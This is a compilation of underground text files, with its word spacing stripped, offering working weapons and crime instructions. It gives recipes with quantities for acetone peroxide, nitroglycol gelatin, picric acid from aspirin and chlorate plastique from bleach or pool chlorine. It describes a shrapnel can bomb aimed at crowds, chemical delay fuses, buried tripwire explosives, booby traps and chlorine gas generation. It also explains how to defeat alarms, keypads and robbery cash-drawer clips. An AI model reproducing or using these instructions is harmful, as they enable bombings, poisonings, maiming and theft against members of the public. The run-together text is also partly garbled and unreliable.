4. Simplesmoke/stinkbombyoucanpurchasesulfuratadrugstoreunderthe nameflowersofsulfur.Nowwhensulfurburnsitwillgiveoffaverystrong odorandplentyofsmoke.Nowallyouneedisafusefromafirecracker,atin can,andthesulfur.Fillthecanwithsulfur(packverylightly),putaluminum foiloverthetopofthecan,pokeasmallholeintothefoil,insertthewick, andlightitandgetoutoftheroomifyouvalueyourlungs.Youcanfindmany usesforthisoratleastIhopeso. FUNWITHALARMS AfactIforgottomentioninmypreviousalarmarticlesisthatonecanalso usepolyurethanefoaminacantosilencehornsandbells.Youcanpurchasethis atanyhardwarestoreasinsulation.Itiseasytohandleanddriesfaster. Manypeoplethattravelcarryapocketalarmwiththem.Thisalarmisasmall devicethatishungaroundthedoorknob,andwhensomeonetouchestheknobhis bodycapacitancesetsoffthealarm.Thesenastynuisancescanbefoundby walkingdownthehallsofahotelandtouchingallthedoorknobsveryquickly. ifyouhappentochanceuponone,attacha3'lengthofwireorothermetal objecttotheknob.Thiswillcausethesleepingbusinesspiginsidetothink someoneisbreakinginandcallroomserviceforhelp.Allsortsoffunand gameswillensue. Somehighsecurityinstallationsusekeypadsjustliketouchtonepads(a registeredtrademarkofbellsystems)toopenlocksordisarmalarms.Mostuse threeorfourdigits.Tofigureoutthecode,wipethekeypadfreefromall fingerprintsbyusingaragsoakedinrubbingalcohol.Afterthekeypadhasbeen usedjustapplyfingerprintdustandallfourdigitswillbemarked.nowall youhavetodoisfigureouttheorder.Ifyouwanttohavesomefunwitha keypad,trypressingthe*and#atthesametime.Manyunitsusethisasa panicbutton.Thiswillbringtheownerandthecopsrunningandeveronewill

haveagoodtime.Nevertrytoremovethesepanelsfromthewall,astheyhave builtintamperswitches. Onthesubjectofholdups,mostplaces(includingsupermarkets,liquorstores, etc.)havewhatisknownasamoneyclip.Theselittlenastiesareplacedatthe bottomofamoneydrawerandwhenthelastfewbillsarewithdrawnaswitch closesandsetsthealarmoff.That'swhywhenyoumakeyourwithdrawalit's besttohelpyourselfsoyoucancheckfortheselittlenasties.Ifyoufind them,merelyinsertonesunderneaththepileoftwenties,andthenpulloutthe twenties,leavingtheonedollarbillbehindtopreventthecircuitfrom closing. SOFTDRINKCANBOMB ANARTICLEFROMTHEBOOK: THEPOORMAN'SJAMESBONDBYKURTSAXON Thisisanantipersonnelbombmeantformillingcrowds.Thebottomofasoft drinkcanishalfcutoutandbentback.Agiantfirecrackerorotherexplosive isputinandsurroundedwithnutsandboltsorrocks.Thefuseisthenarmed withachemicaldelayinaplasticdrinkingstraw. Afterfirstmakingsuretherearenochildrennearby,theacidorglycerineis putintothestrawandthecanissetdownbyatreeorwallwhereitwillnot beknockedover.Thedelayshouldgiveyouthreetofiveminutes.Itwillthen haveashatteringeffectonpassersby. Itishardlylikelythatanyonewouldpickupanddrinkfromsomeoneelse'ssoft drinkcan.butifsuchacrudepersonshouldtrytodrinkfromyourbombhe wouldbreakanastyhabitfast! !! !! !!<CHEMICALINGITER !!1!! !=====! !*!!"! !!!! !!!!<BIGFIRECRACKER !!!%! !====! !! !#! !! !!!<NUTS&BOLTS !/! !! PyroBookII byCaptHackandGreyWolf TIMEDELAYEDCHEMICALFUSE 1. Put1teaspoonfullofpotassiumpermanganateinatincan. 2. Addafewdropsofglycerine. 3. Wait34min. 4. Getthehellout.Thestuffwillsmoke,thenburstintoflames. Potassiumpermanganatestainslikeiodinebutworse[it'spurple].Thereaction willspatterabitsoitcanbemessyanditdoesn'tmatteriftheamountsare uneven[i.e.1partto3parts] EXPLOSIVESANDINCENDIARIESbyTHERESEARCHER

INTRODUCTION: Thetroublewithtextbooksonchemistryandexplosivesistheattitudewith whichtheyarewritten.Theydon'tsay,"NowIknowyouwouldliketoblowholy helloutofsomethingjustforthefunofitsohereishowtowhipupsomething inyourkitchentodoit".TheytellyouhowDupontdoesitorhowtheancient Chinesediditbutnothowyoucandoitwiththeresourcesandmaterials availabletoyou. Evenarmymanualsonfieldexpedientexplosivesarealmostuselessbecausethey arejustoutlineswrittenwiththeunderstandingthataninstructorisgoingto fillintheblanks.Itisafungametosearchoutthematerialsthatcanbeput togethertomakesomethinggo"boom".Youcanfindwhatyouneedingrocery stores,hardwarestores,andfarmsupplies.Aninterestingpointtorememberis thatitismucheasiertomakeabigeexplosionthanasmallone.Itisvery difficultforahomeexperimentertomakeafirecracker,butabombcapableof blowingthewallsoutofabuildingiseasy. HOWTOMAKEROCKETFUEL Thisiseasytomakeandfuntoplaywith.MixequalpartsbyvolumePotassium orSodiumNitrateandgranulatedsugar.Pourabigspoonfulofthisintoapile. Stickapieceofblackmatchfuseintoit;light;andstepback.Thisisalsoa veryhotincendiary.Alittleimaginationwillsuggestalotofexperimentsfor this. ANOTHERROCKETFUEL Mixequalpartsbyvolumeofzincdustandsulfur.Watchoutifyouexperiment withthis.Itgoesoffinasuddenflash.Itisnotapowerfulexplosive,butis violentstuffevenwhennotconfinedbecauseofitsfastburningrate. AsIcontinuefromthispointsomeoftheingredientsaregoingtobeharderto getwithoutgoingthroughachemicalsupply.Itrytoavoidthis.Ihappento knowthatB.PrieserScientific(localtomyarea)hasbeeninstructedbythe policetosendthemthenamesofanyonebuyingchemicalsincertain combinations.Forexample,ifapersonweretobuySulfuricacid,Nitricacid andToluene(themakingsforTNT)inoneorderthepolicewouldbenotified.I willdothebestIcantotellyouhowtomakethethingsyouneedfromcommonly availablematerials,butIdon'twanttoleaveoutsomethingreallygoodbecause youmighthavetoscroungeforaningredient.Iamguessingyouwouldpreferit thatway. HOWTOMAKEANEXPLOSIVEFROMCOMMONMATCHES Pinchtheheadnearthebottomwithapairofwirecutterstobreakitup;then usetheedgesofthecutterstoscrapeofftheloosematerial.Itgetseasywith practice.YoucandothiswhilewatchingTVandcollectenoughforabomb withoutdyingofboredom. Onceyouhaveagoodbatchofit,youcanloaditintoapipeinsteadofblack powder.Becarefulnottogetanyinthethreads,andwipeoffanythatgetson theendofthepipe.Nevertrytousethisstuffforrocketfuel.Ascience teacherwaskilledthatway. JustforfunwhileI'monthesubjectofmatches,didyouknowthatyoucan strikeasafetymatchonawindowpane?Holdapapermatchbetweenyourthumb andfirstfinger.Withyoursecondfinger,presstheheadfirmlyagainstalarge window.Veryquickly,rubthematchdownthepaneabout2feetwhilemaintaining thepressure.Thefrictionwillgenerateenoughheattolightthematch. Anotherfuntrickisthematchrocket.Tightlywrapthetophalfofapaper matchwithfoil.Setitinthetopofapopbottleata45angle.Holda lightedmatchundertheheaduntilitignites.Ifyougotitright,thematch willzipupandhittheceiling.

IjustrememberedthematchgunsIusedtomakewhenIwasakid.Thesearemade fromabicyclespoke.Atoneendofthespokeisapiecethatscrewsoff.Take itoffandscrewitonbackwards.Younowhaveapieceofstiffwirewitha smallhollowtubeononeend.Packthematerialfromacoupleofwoodensafety matchesintothetube.Forcethestemofamatchintothehole.Itshouldfit verytightly.Holdalightedmatchunderthetubeuntilitgetshotenoughto ignitethepowder.Itgoesoffwithabang. HOWTOMAKECONCENTRATEDSULFURICACIDFROMBATTERYACID Gotoanautosupplystoreandaskfor"asmallbatteryacid".Thisshouldonly costafewdollars.Whatyouwillgetisaboutagallonofdilutesulfuricacid. Putapintofthisintoaheatresistantglasscontainer.Theglasspitchers usedformakingcoffeeareperfect.Donotuseametalcontainer. Useanextensioncordtosetupahotplateoutdoors.Boiltheaciduntilwhite fumesappear.Assoonasyouseethewhitefumes,turnoffthehotplateandlet theacidcool.Pourthenowconcentratedacidintoaglasscontainer.The containermusthaveaglassstopperorplasticcapnometal.Itmustbeair tight.Otherwise,theacidwillquicklyabsorbmoisturefromtheairandbecome diluted.Wanttoknowhowtomakeatimebombthatdoesn'ttickandhasnowires orbatteries?Holdontoyouracidandfollowmeintothenextinstallment. HOWTOMAKEACHEMICALTIMEDELAYFUSE: Togetanunderstandingofhowthisisgoingtowork,mixupequalpartsby volumePotassiumchlorateandgranulatedsugar.Pouraspoonfulofthemixture inasmallpileandmakeadepressioninthetopwiththeendofaspoon.Using amedicinedropper,placeonedropofconcentratedsulfuricacidinthe depressionandstepback. Itwillsnapandcrackleafewtimesandthenburstintovigorousflames.To makethefuse,cutabout2inchesoffaplasticdrinkingstraw.Tampasmall pieceofcottoninoneend.Ontopofthisputaboutaninchofthe clorate/sugarmixture. Nowlightlytampinaboutaquarterinchofeitherglasswoolorasbestos fibers.Securethiswiththeopenendupanddropin3or4dropsofsulfuric acid.Afterafewminutestheacidwillsoakthroughthefibersandignitethe mixture. Thetimedelaycanbecontrolledbytheamountoffiberusedandbyvaryinghow tightlyitispacked.Don'tusecottonforthis.Theacidwillreactwithcotton andbecomeweakenedintheprocess.Bypunchingaholeinthesideofthestraw, apieceofblackmatchorotherfusecanbeinsertedandusedtosetoffthe deviceofyourchoice. Potassiumchloratewasverypopularwiththeradicalunderground.Itcanbeused tomakeawidevarietyofexplosivesandincendiaries,someofthemextremely dangeroustohandle.Theradicalslostseveralpeoplethatway.But,don't worry.Iamnotgoingtotrytoprotectyoufromyourself.Ihavedecidedto tellall.IwillhavemoretosayaboutPotassiumchlorate,butfornow,let's lookatacoupleofinterestingelectricfuses. PEROXYACETONE PEROXYACETONEISEXTREMELYFLAMMABLEANDHASBEENREPORTEDTOBESHOCKSENSITIVE MATERIALS: 4mLAcetone 4mL30%HydrogenPeroxide 4dropsConc.HydrochloricAcid 150mmTestTube

Add4mLacetoneand4mLhydrogenperoxidetothetesttube.Thenadd4drops concentratedhydrochloricacid.In1020minutesawhitesolidshouldbeginto appear.Ifnochangeisobserved,warmthetesttubeinawaterbathat40C. Allowthereactiontocontinuefortwohours.Swirltheslurryandfilterit. Leaveoutonfilterpapertodryforatleasttwohours.Toignite,lighta candletiedtoameterstickandlightit(whilestayingatleastameteraway). Iwouldliketogivecredittoabookbyshakasharientitled"Chemical demonstrations"forafewofthepreciseamountsofchemicalsinsome experiments. THECHEMIST'SCORNER#2: HOUSEHOLDCHEMICALS,BYZAPHODBEEBLEBROX/MPG Thisarticledealswithinstructionsonhowtodosomeinterestingexperiments withcommonhouseholdchemicals.Somemayormaynotworkdependingonthe concentrationofcertainchemicalsindifferentareasandbrands.Iwould suggestthatthepersondoingtheseexperimentshavesomeknowledgeof chemistry,especiallyforthemoredangerousexperiments. Iamnotresponsibleforanyinjuryordamagecausedbypeopleusingthis information.Itisprovidedforusebypeopleknowledgeableinchemistrywhoare interestedinsuchexperimentsandcansafelyhandlesuchexperiments. I.ALISTOFHOUSEHOLDCHEMICALSANDTHEIRCOMPOSITION VINEGAR:35%ACETICACIDBAKINGSODA:SODIUMBICARBONATE DRAINCLEANERS:SODIUMHYDROXIDESANIFLUSH:75%SODIUMBISULFATE AMMONIAWATER:AMMONIUMHYDROXIDECITRUSFRUIT:CITRICACID TABLESALT:SODIUMCHLORIDESUGAR:SUCROSE MILKOFMAGNESIA:MAGNESIUMHYDROXIDETINCTUREOFIODINE:4%IODINE RUBBINGALCOHOL:70%OR99%(DEPENDSONBRAND)ISOPROPYLALCOHOL(DONOTDRINK!) GENERATINGCHLORINEGAS Thisisslightlymoredangerousthantheothertwoexperiments,soyoushould knowwhatyou'redoingbeforeyoutrythis... Everwonderwhyammoniabottlesalwayssay'donotmixwithchlorinebleach', andvisaversa?That'sbecauseifyoumixammoniawaterwithAjaxorsomething likeit,itwillgiveoffchlorinegas.Tocaptureit,getalargebottleand putAjaxinthebottom.Thenpoursomeammoniadownintothebottle.Sincethe chlorineisheavierthanair,itwillstaydowninthereunlessyouuselarge amountsofeitherAjaxorammonia(don't!). CHLORINE+TURPENTINE Takeasmallclothorragandsoakitinturpentine.Quicklydropitintothe bottleofchlorine.Itshouldgiveoffalotofblacksmokeandprobablystart burning... GENERATINGHYDROGENGAS Togeneratehydrogen,allyouneedisanacidandametalthatwillreactwith thatacid.Tryvinegar(aceticacid)withzinc,aluminum,magnesium,etc.You cancollecthydrogeninsomethingifyounotethatitislighterthanair.... lightasmallamountanditburnswithasmall*pop*. Anotherwayofcreatinghydrogenisbytheelectrolysisofwater.Thisinvolve separatingwater(H2O)intohydrogenandoxygenbyanelectriccurrent.Todo this,youneeda612voltbattery(oraDCtransformer),twotesttubes,a largebowl,twocarbonelectrodes(takethemoutofanunworking612volt battery),andtablesalt.Dissolvethesaltinalargebowlfullofwater. Submergethetwotesttubesinthewaterandputtheelectrodesinsidethem, withthemouthofthetubeaimingdown.Connectthebatterytosomewiregoing

downtotheelectrodes. Thiswillworkforawhile,butchlorinewillbegeneratedalongwiththeoxygen whichwillcorrodeyourcopperwiresleadingtothecarbonelectrodes...(the tablesaltisbrokenupintochlorineandsodiumions,thechlorinecomesoffas agaswithoxygenwhilesodiumreactswiththewatertoformsodium hydroxide....).therefore,ifyoucangetyourhandsonsomesulfuricacid,use itinstead.itwillnotaffectthereactionotherthanmakingthewaterconduct electricity. WARNING: DONOTuseatransformerthatoutputsACcurrent!NotonlyisACinherentlymore dangerousthanDC,italsoproducesbothHydrogenandOxygenateachelectrode. HYDROGEN+CHLORINE Takethetesttubeofhydrogenandcoverthemouthwithyourthumb.Keepit inverted,andbringitnearthebottleofchlorine(notonethathasreacted withturpentine).Say"goodbyetesttube",anddropitintothebottle.The hydrogenandchlorineshouldreactandpossiblyexplode(dependingonpurityand amountofeachgas).Aninterestingthingaboutthisistheywillnotreactif itisdarkandnoheatorotherenergyisaround.Whenalightisturnedon, enoughenergyispresenttocausethemtoreact... PREPARATIONOFOXYGEN Getsomehydrogenperoxide(fromadrugstore)andmanganesedioxide(froma batteryit'sablackpowder).Mixthetwoinabottle,andtheygiveoff oxygen.Ifthebottleisstoppered,pressurewillbuildupandshootitoff. Trylightingawoodsplintandstickingit(whenonlyglowing)intothebottle. Theoxygenwillmakeitburstintoflame.Theoxygenwillallowthingstoburn better... IODINE Tinctureofiodinecontainsmainlyalcoholandalittleiodine.Toseparate them,putthetinctureofiodineinametallidtoabottleandheatitovera candle.Haveastandholdinganothermetalliddirectlyoverthetincture(about 46inchesaboveit)withiceontopofit.Thealcoholshouldevaporate,and theiodineshouldsublime,butshouldreformiodinecrystalsonthecoldmetal liddirectlyabove.Ifthisworks(Ihaven'ttried),youcanusetheiodine alongwithhouseholdammoniatoformnitrogentriiodide. IhavefoundthatPoolChlorinetabletswithstronghouseholdammoniareactto produceLOTSofchlorinegasandheat...alsomixingthetabletswithrubbing alcoholproducesheat,adifferent(andhighlyflammable)gas,andpossiblysome sortofacid(iteatsawayatjustaboutanythingittouches) TRIPWIRES byTheMortician WellfirstofallIrecommendthatyoureadthefileonmyboardabout landmines...Ifyoucan'tthenhereistheconcept. Youcanuseanm80,h100,blockbusteroranyothertypeofexplosivethatwill lightwithafuse.Nowthewaythisworksisifyouhavea9voltbattery,get eitherasolarigniter(preferably)orsomesteelwoolyoucancreatearemote ignitionsystem.Whatyoudoitsetupaschematiclikethis. >+battery steel||>battery wool||/ :==:<fuse\ ||/

spstswitch\ Sowhentheswitchisonthecurrnetwillflowthroughthesteelwoolorigniter andheatupcausingthefusetolight.Note:Forusewithsteelwooltryit firstandgetareallythinpieceofwireandpumpthecurrentthroughitto makesureitwillheatuptolighttheexplosive. Nowthethingtodoisplantyourexplosivewhereveryouwantittobe,buryit andcoverthewires.Nowtakeafishingline(about20lb.test)andtieoneend toasecureobject.Haveyourswitchsecuredtosomethingandmakealooponthe otherendontheline.Putthelooparoundtheswitchsuchthatwhenpulledit willpulltheswitchandsetofftheexplosive. Toignitetheexplosive...Thethingtodoistoexperimentwiththisandfind yourbestmethod...Letmeknowonanygoodkills,ornewtechniques...Onmy board...(201)3764462 BOOBYTRAPTRIPWIRES BYVladTepes(ofChicagoC64fame) HereisamethodforconstructingboobytrapswhichIpersonallyinvented,and whichIhavefoundtoworkbetterthananyothertypeofreleaseboobytrap. Therearemanypossiblevariationsonthisdesign,butthebasicpremiseremains thesame.Whatyou'llneed: 34nailseach2incheslongandsoftenoughtobendeasily(galvanized ironworkswell) 6feetofwireorfishingline 515feetofstrongstringorrope 1reallysickmind. Hammertwoofthenailsintothetrunkofatree(aboutoneinchapart)sothey formahorizontalline.Theyshouldbeangledslightlyupward,about30. BendeachnailDownwardaboutoneinchoutfromthetrunk.Takeyournefarious device(sayasmallrocksuspendedinatree)andrigaropeorstringsothe linecomesDOWNtowardsthetwonails.Tiealoopinthestringsotheloop *just*reachesbetweenthetwonails,andpassathirdnailbetweenthetwo nailswiththelooparoundthisnailbetweenthetwoothers(seediagrams) bentnails /||^slightupwardtension #/\|| #/@||@(@arethetwonails,headon) #!() #tripwire \/ Trunkthirdnail Nowtieoneendofthefishinglinetotheheadofthethirdnail,andtheother endaroundanothertreeortoanail(inanothertree,arootorastumpetc). Whensomebodypullsonthetripwire,thenailwillbepulledoutandyoursick creationwillbereleasedtodoit'sdamage(trytyingittoafiringpin). Thereareseveralpossiblevariations.Morethanonetripwirecanbeattached tothesamenail,orthisdevicecanbeusedtoarmasecondtripwire.Large wirestaplesorhookandeyeloopscanbeusedtoreplacethetwobentnails. Amoreinterestingvariationusesastraightpieceofmetalrodwithaholeat eachend,orwithashortwireloopweldedtoeachend.Oneendisattachedto

thetripwire,theotherisattachedtoaspring. || */\/\/\/\/\===()=======* SPRINGBOLTTripwire Withthisdesigntheloopwillbereleasedifthetripwireispulledorifitis broken.Thespringshouldbeundermoderatetensionandwelloiled. ImprovisedExplosives Writtenby:TheLich GelatinExplosivefromAntiFreeze CAUTION:THISFORMULAASSUMESTHATTHEMAKERHASNOQUALMSABOUTKILLINGHIS/HER SELFINTHEPROCESS. Thisexplosiveisalmostthesameasthenitrogelatinplastiqueexplosive exceptthatitissuppleandpliableto10Cto20C Antifreezeiseasiertoobtainthanglycerineandisusuallycheaper.Itneeds tobefreedofwaterbeforethemanufactureandthiscanbedonebytreatingit withcalciumchlorideuntilaspecificgravityof1.12at0Cor1.11at20Cis obtained. Thiscanbedonebyaddingcalciumchloridetotheantifreezeandcheckingwith ahydrometerandcontinuetoaddcalciumchlorideuntiltheproperreadingis obtained.Theantifreezeisthenfilteredtoremovethecalciumchloridefrom theliquid.Thisexplosiveissuperiortonitrogelatininthatitiseasierto collidontheIMRsmokelesspowderintotheexplosiveandthatthe50/50ether ethylalcoholcanbedoneawaywith.Itissuperiorinthattheformationofthe collidonisdoneveryrapidlybythenitroetheleneglycol. It'sdetonationpropertiesarepracticallythesameasthenitrogelatine.Like thenitrogelatineitishighlyflammableandifcaughtonfirethechancesare goodthattheflamewillprogresstodetonation.Inthisexplosiveasinnitro gelatinetheadditionof1%sodiumcarbonateisagoodideatoreducethechance ofresidualacidbeingpresentinthefinalexplosive.Thefollowingisa slightlydifferentformulathannitrogelatine: Nitroglycol75%Guncotton(IMR)6%PotassiumNitrate14%Flour5% Inthisprocessthe50/50stepisomitted.Mixthepotassiumnitratewiththe nitroglycol.Rememberthatthisnitroglycolisjustassensitivetoshockas isnitroglycerin. Thenextstepistomixinthebakingflourandsodiumcarbonate.Mixtheseby kneadingwithglovedhandsuntilthemixtureisuniform.Thiskneadingshouldbe donegentlyandslowly.ThemixtureshouldbeuniformwhentheIMRsmokeless powderisadded.Againthisiskneadedtouniformity.Usethisexplosiveassoon aspossible. Ifitmustbestored,storeinacool,dryplace(010C).Thisexplosiveshould detonateat76007800m/sec..Thesetwoexplosivesareverypowerfulandshould besensitivetoa#6blastingcaporequivalent. Theseexplosivesaredangerousandshouldnotbemadeunlessthemanufacturer hashadexperiencewiththistypecompound.Thefoolishandignorantmayaswell forgettheseexplosivesastheywon'tlivetogettousethem. Don'tgetmewrong,theseexplosiveshavebeenmanufacturedforyearswithan amazingrecordofsafety.Millionsoftonsofnitroglycerinehavebeenmadeand

usedtomanufacturedynamiteandexplosivesofthisnaturewithveryfew mishaps. Nitroglycerinandnitroglycolwillkillandtheirmainvictimsarethestupid andfoolhardy.Beforemanufacturingtheseexplosivestakeadropof nitroglycerinandsoakintoasmallpieceoffilterpaperandplaceitonan anvil. Hitthisdropwithahammeranddon'tputanymoreontheanvil.SeewhatI mean!Thisexplosivecompoundisnottobetakenlightly.Ifthereareany doubtsDON'T. ImprovisedExplosivesPlastiqueExplosivefromAspirin Thisexplosiveisaphenolderivative.ItisHIGHLYtoxicandexplosive compoundsmadefrompicricacidarepoisonousifinhaled,ingested,orhandled andabsorbedthroughtheskin.Thetoxicityofthisexplosiverestrictsitsuse duetothefactthatoverexposureinmostcasescausesliverandkidneyfailure andsometimesdeathifimmediatetreatmentisnotobtained. ThisexplosiveisacousintoTNTbutismorepowerfulthanit'scousin.Itis thefirstexplosiveusedmilitarilyandwasadoptedin1888asanartillery shellfiller.Originallythisexplosivewasderivedfromcoaltarbutthanksto modernchemistryyoucanmakethisexplosiveeasilyinapproximatelythreehours fromacetylsalicylicacid(aspirinpurified). Thisprocedureinvolvesdissolvingtheacetylsalicylicacidinwarmsulfuric acidandaddingsodiumorpotassiumnitratewhichnitratesthepurifiedaspirin andthewholemixturedrownedinwaterandfilteredtoobtainthefinalproduct. Thisexplosiveiscalledtrinitrophenol.Careshouldbetakentoensurethat thisexplosiveisstoredinglasscontainers.Picricacidwillformdangerous saltswhenallowedtocontactallmetalsexcepttinandaluminum.Thesesalts areprimaryexplosiveandaresupersensitive.Theyalsowillcausethe detonationofthepicricacid. Tomakepicricacidobtainsomeaspirin.Thecheaperbrandsworkbestbut bufferedbrandsshouldbeavoided.Powderthesetabletstoafineconsistency. Toextracttheacetylsalicylicacidfromthispowderplacethispowderinmethyl alcoholandstirvigorously.Notallofthepowderwilldissolve.Filterthis powderoutofthealcohol.Againwashthispowderthatwasfilteredoutofthe alcoholwithmorealcoholbutwithalesseramountthanthefirstextraction. Againfiltertheremainingpowderoutofthealcohol.Combinethenowclear alcoholandallowittoevaporateinapyrexdish.Whenthealcoholhas evaporatedtherewillbeasurprisingamountofcrystalsinthebottomofthe pyrexdish. Takefortygramsofthesepurifiedacetylsalicylicacidcrystalsanddissolve themin150mLofsulfuricacid(98%,specifygravity1.8)andheattodissolve allthecrystals.Thisheatingcanbedoneinacommonelectricfryingpanwith thethermostatseton150Fandfilledwithagoodcookingoil. Whenallthecrystalshavedissolvedinthesulfuricacidtakethebeaker,that you'vedoneallthisdissolvingin(600mL),outoftheoilbath.Thisnextstep willneedtobedonewithaverygoodventilationsystem(itisagoodideato doanychemistryworksuchasthewholeprocedureandanyprocedureonthisdisk withgoodventilationoroutside).Slowlystartadding58gofsodiumnitrateor 77gofpotassiumnitratetotheacidmixtureinthebeakerveryslowlyinsmall portionswithvigorousstirring.Aredgas(nitrogentrioxide)willbeformed andthisshouldbeavoided. Themixtureislikelytofoamupandtheadditionshouldbestoppeduntilthe foaminggoesdowntopreventtheoverflowoftheacidmixtureinthebeaker. Whenthesodiumorpotassiumnitratehasbeenaddedthemixtureisallowedto

coolsomewhat(3040C).Thesolutionshouldthenbedumpedslowlyintotwice it'svolumeofcrushediceandwater.Thebrilliantyellowcrystalswillformin thewater.Theseshouldbefilteredoutandplacedin200mLofboiling distilledwater.Thiswaterisallowedtocoolandthenthecrystalsarethen filteredoutofthewater.Thesecrystalsareavery,verypuretrinitrophenol. Thesecrystalsarethenplacedinapyrexdishandplacesinanoilbathand heatedto80Candheldtherefor2hours.Thistemperatureisbestmaintained andcheckedwithathermometer. Thecrystalsarethenpowderedinsmallquantitiestoafacepowderconsistency. Thesepowderedcrystalsarethenmixedwith10%byweightwaxand5%vaseline whichareheatedtomeltingtemperatureandpouredintothecrystals.Themixing isbestdonebykneadingtogetherwithglovedhands.Thisexplosiveshouldhave ausefulplasticityrangeof040C.Thedetonationvelocityshouldbearound 7000m/sec..Itistoxictohandlebutsimplymadefromcommoningredientsand issuitableformostdemolitionworkrequiringamoderatelyhighdetonation velocity.Itisverysuitableforshapedchargesandsomesteelcuttingcharges. ItisnotasgoodanexplosiveasC4orotherRDXbasedexplosivesbutitis mucheasiertomake.Againthisexplosiveisverytoxicandshouldbetreated withgreatcare. AVOIDHANDLINGBAREHANDED,BREATHINGDUSTANDFUMES,AVOIDANYCHANCEOF INGESTION.AFTERUTENSILSAREUSEDFORTHEMANUFACTUREOFTHISEXPLOSIVERETIRE THEMFROMTHEKITCHENASTHECHANCEOFPOISONINGISNOTWORTHTHERISK.THIS EXPLOSIVE,IFMANUFACTUREDASABOVE,SHOULDBESAFEINSTORAGEBUTWITHANY HOMEMADEEXPLOSIVESTORAGEOSNOTRECOMMENDEDANDEXPLOSIVESSHOULDBEMADEUP ASNEEDED. ImprovisedExplosivesPlastiqueExplosivefromBleach Thisexplosiveisapotassiumchlorateexplosive.Thisexplosiveandexplosives ofsimilarcompositionwereusedinWorldWarIIasthemainexplosivefillerin grenades,landmines,andmortarusedbyFrench,German,andotherforces involvedinthatconflict.Theseexplosivesarerelativelysafetomanufacture. Oneshouldstrivetomakesuretheseexplosivesarefreeofsulfur,sulfides, andpicricacid.Thepresenceofthesecompoundsresultinmixturesthatareor canbecomehighlysensitiveandpossiblydecomposeexplosivelywhileinstorage. Themanufactureofthisexplosivefrombleachisgivenasjustanexpedient method.Thismethodofmanufacturingpotassiumchlorateisnoteconomicaldueto theamountofenergyusedtoboilthesolutionandcausethe'dissociation' reactiontotakeplace.Thisproceduredoesworkandyieldsarelativelypure andasulfur/sulfidefreeproduct.Theseexplosivesareverycapsensitiveand requireonlya#3capforinstigatingdetonation. Tomanufacturepotassiumchloratefrombleach(5%sodiumhypochloritesolution) obtainaheatsource(hotplateetc.)abatteryhydrometer,alargepyrexor enameledsteelcontainer(toweighchemicals),andsomepotassiumchloride(sold assaltsubstitute).Takeonegallonofbleach,placeitinthecontainerand beginheatingit.Whilethissolutionheats,weighout63gpotassiumchloride andaddthistothebleachbeingheated.Bringthissolutiontoaboiland boileduntilwhencheckedbyahydrometerthereadingis1.3(ifabattery hydrometerisuseditshouldreadfullcharge). Whenthereadingis1.3takethesolutionandletitcoolintherefrigerator untilit'sbetweenroomtemperatureand0C.Filteroutthecrystalsthathave formedandsavethem.Boilthesolutionagainuntilitreads1.3onthe hydrometerandagaincoolthesolution.Filteroutthecrystalsthathaveformed andsavethem.Boilthissolutionagainandcoolasbefore. Filterandsavethecrystals.Takethesecrystalsthathavebeensavedandmix themwithdistilledwaterinthefollowingproportions:56gper100mLdistilled

water.Heatthissolutionuntilitboilsandallowittocool.Filterthe solutionandsavethecrystalsthatformuponcooling.Theprocessif purificationiscalledfractionalcrystallization.Thesecrystalsshouldbe relativelypurepotassiumchlorate. Powderthesetotheconsistencyoffacepowder(400mesh)andheatgentlyto driveoffallmoisture.Meltfivepartsvaselineandfivepartswax.Dissolve thisinwhitegasoline(campstovegasoline)andpourthisliquidon90parts potassiumchlorate(thecrystalsfromtheaboveoperation)inaplasticbowl. Kneadthisliquidintothepotassiumchlorateuntilimmediatelymixed.Allowall thegasolinetoevaporate.Placethisexplosiveinacool,dryplace.Avoid friction,sulfur,sulfide,andphosphorouscompounds. Thisexplosiveisbestmoldedtothedesiredshapeanddensity(1.3g/cc)and dippedinwaxtowaterproof.Theseblocktypechargesguaranteethehighest detonationvelocity.Thisexplosiveisreallynotsuitedtouseinshapedcharge applicationsduetoitsrelativelylowdetonationvelocity.Itiscomparableto 40%ammoniadynamiteandcanbeconsideredthesameforthesakeofcharge computation. Ifthepotassiumchlorateisboughtandnotmadeitisputintothemanufacture processinthepowderingstagesprecedingtheadditionofthewax/vaseline mixture.Thisexplosiveisbristantandpowerful.Theadditionof23%aluminum powderincreasesitsblasteffect.Detonationvelocityis3300m/sec. PlastiqueExplosivesFromSwimmingPoolChlorinatingCompound Thisexplosiveisachlorateexplosivefrombleach.Thismethodofproductionof potassiumorsodiumchlorateiseasierandyieldsamorepureproductthandoes theplastiqueexplosivefrombleachprocess. InthisreactiontheHTH(calciumhypochloriteCaC10)ismixedwithwaterand heatedwitheithersodiumchloride(tablesalt,rocksalt)orpotassiumchloride (saltsubstitute).Thelatterofthesesaltsisthesaltofchoiceduetothe easycrystallizationofthepotassiumchlorate. Thismixturewillneedtobeboiledtoensurecompletereactionofthe ingredients.ObtainsomeHTHswimmingpoolchlorinationcompoundorequivalent (usually65%calciumhypochlorite).Aswiththebleachprocessmentionedearlier thereactiondescribedbelowisalsoadissociationreaction.Inalargepyrex glassorenameledsteelcontainerplace1200gHTHand220gpotassiumchlorideor 159gsodiumchloride.Addenoughboilingwatertodissolvethepowderandboil thissolution.Achalkysubstance(calciumchloride)willbeformed.Whenthe formationofthischalkysubstanceisnolongerformedthesolutionisfiltered whileboilinghot.Ifpotassiumchloridewasusedpotassiumchloratewillbe formed. Thispotassiumchloratewilldropoutorcrystallizeastheclearliquidleft afterfilteringcools.Thesecrystalsarefilteredoutwhenthesolutionreaches roomtemperature.Ifthesodiumchloridesaltwasusedthisclearfiltrate (clearliquidafterfiltration)willneedtohaveallwaterevaporated.This willleavecrystalswhichshouldbesaved. Thesecrystalsshouldbeheatedinaslightlywarmoveninapyrexdishtodrive offalltracesofwater(4075C).Thesecrystalsaregroundtoaveryfine powder(400mesh). Ifthesodiumchloridesaltisusedintheinitialstepthecrystallizationis muchmoretimeconsuming.Thepotassiumchlorideisthesalttouseasthe resultingproductwillcrystallizeoutofthesolutionasitcools.Thepowdered andcompletelydrychloratecrystalsarekneadedtogetherwithvaselineina plasticbowl.ALLCHLORATEBASEDEXPLOSIVESARESENSITIVETOFRICTIONANDSHOCK ANDTHESESHOULDBEAVOIDED.Ifsodiumchlorideisusedinthisexplosiveit

willhaveatendencytocakeandhasaslightlylowerdetonationvelocity. Thisexplosiveiscomposedofthefollowing: Potassium/SodiumChlorate90% Vaseline10%

